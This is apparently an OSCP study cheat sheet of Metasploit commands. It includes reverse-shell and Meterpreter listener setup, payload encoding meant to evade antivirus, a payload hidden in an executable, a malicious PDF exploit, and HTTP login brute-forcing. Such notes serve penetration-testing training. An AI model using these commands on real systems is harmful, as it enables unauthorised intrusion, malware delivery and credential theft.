Metasploit

Framework to manage vulnerabilities and exploits.

NOT ALLOWED DURING THE OSCP EXAM. Limited to one machine, NO AD machine!

For generating payloads, see Msfvenom.
For Meterpreter sessions, see Meterpreter.

Update Metasploit
Start & Setup
Workspaces
Modules
Listener
Vulnerabilities & Exploits

Update Metasploit

msfupdate is deprecated.

sudo apt update
sudo apt upgrade metasploit-framework

Start & Setup

Setup

Build the database, first time only.

sudo service postgresql start
sudo msfdb init

Fix message: “To use retry middleware with Faraday v2.0+, install faraday-retry gem”

sudo gem install faraday-retry

Start the Metasploit console

sudo msfconsole -q

If msfconsole is broken…

cd /usr/share/metasploit-framework
sudo gem install bundler:2.2.5
sudo bundle install

Workspaces

Use workspaces to separate results from investigations.

List workspaces

workspace

Use an existing workspace

workspace <workspace name>

Create a workspace

workspace -a <workspace name>

Delete a workspace

workspace -d <workspace name>

Modules

Auxiliary modules (enumeration, scanners, fuzzing, sniffing)

Hierarchical syntax:

  • <module>/<type or OS>/<vendor>/<app>
  • <protocol>/<module>
show auxiliary
search type:auxiliary name:http

Listener

Netcat

Use with non-staged reverse TCP payloads

sudo nc -lnvp 443

Multi Handler

The Multi Handler is allowed on ALL machines during the OSCP exam, but any Meterpreter payload IS RESTRICTED to one machine.

  • -j: run in background (use jobs command)
  • -z: do not automatically interact with the session

Resource scripts

Write all commands in a file and execute it.

sudo msfconsole -q -r <script name>.rc

Basic example

use exploit/multi/handler
set PAYLOAD [msfvenom Payload name]
set LHOST [Kali IP address]
set LPORT [Listening port on Kali]
set ExitOnSession false
exploit -j -z

Advanced example

The StageEncoder is used to try evading detection for the second part of a staged payload.

use exploit/multi/handler
set PAYLOAD [msfvenom Payload name]
show advanced
set LHOST [Kali IP address]
set LPORT [Listening port on Kali]
set EXITFUNC thread
set ExitOnSession false
set AutoRunScript windows/gather/enum_logged_on_users
set AutoRunScript post/windows/manage/migrate
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set Workspace test
exploit -j -z
jobs
jobs -i <job id>
kill <job id>

Example for TCP listener on Kali, Meterpreter

msfconsole -q
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
set ExitOnSession false
exploit -j -z
sessions -l -v
sessions -i <session_id>

Vulnerabilities & Exploits

Search vulnerabilities/exploits

search -h

Search for a specific vulnerability

search ms03-026
search cve:2021 type:exploit
search cve:2021 type:exploit rank:excellent
search browser chrome type:exploit date:2021

Exploit a vulnerability

use exploit/windows/dcerpc/ms03_026_dcom

Show payloads

Module exploits require a payload. When not specified, a default payload will be used.

show payloads
set payload windows/shell_reverse_tcp

Generating a payload

For generating payloads, see Msfvenom.

use windows/shell_reverse_tcp
generate LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/whoami.exe -o myprecious.exe

Show module options

Will require some input, like IP addresses, show what is needed.

show options
show advanced

Set module options

set RHOST x.x.x.x
show options

Set module options – globally

setg RHOSTS x.x.x.1-254
setg LHOST tun0

Run the module

Will return a meterpreter session connected to the victim

run
exploit

For Meterpreter sessions, see Meterpreter.

Nmap

Execute Nmap within Metasploit and save the results into Metasploit’s database.

db_nmap <nmap options>
db_nmap -A -Pn x.x.x.x

Hosts Information

Services

services -h
services
services -p 80

Search for hosts with open port 80, then sets the RHOSTS options with the results.

services -p 80 --rhosts

Hosts

hosts -h
hosts

Build Metasploit Modules

Building a Module

Msfconsole will look in ~/.msf4/modules. So when using sudo msfconsole, it will look in /root/.msf4/modules.

Generate malicious PDF file for Windows

search type:exploit platform:windows adobe pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
exploit (adobe_pdf_embedded_exe) > info
exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
exploit (adobe_pdf_embedded_exe) > show options
exploit (adobe_pdf_embedded_exe) > set INFILENAME chapter1.pdf
exploit (adobe_pdf_embedded_exe) > set FILENAME chapter1.pdf
exploit (adobe_pdf_embedded_exe) > set LHOST x.x.x.x
exploit (adobe_pdf_embedded_exe) > show options
exploit (adobe_pdf_embedded_exe) > exploit

# Metasploit has placed this file at /root/.msf4/local/chapter1.pdf.

Quit Metasploit

exit

Bruteforce Oracle Weblogic & HTTP Basic Auth

echo "weblogic" > /root/users.txt

msfconsole
use auxiliary/scanner/http/http_login
set user_file /root/users.txt
set pass_file /usr/share/wordlists/rockyou.txt
set rhosts x.x.x.x
set rport 7879
set SSL true
set threads 5
set stop_on_success true
exploit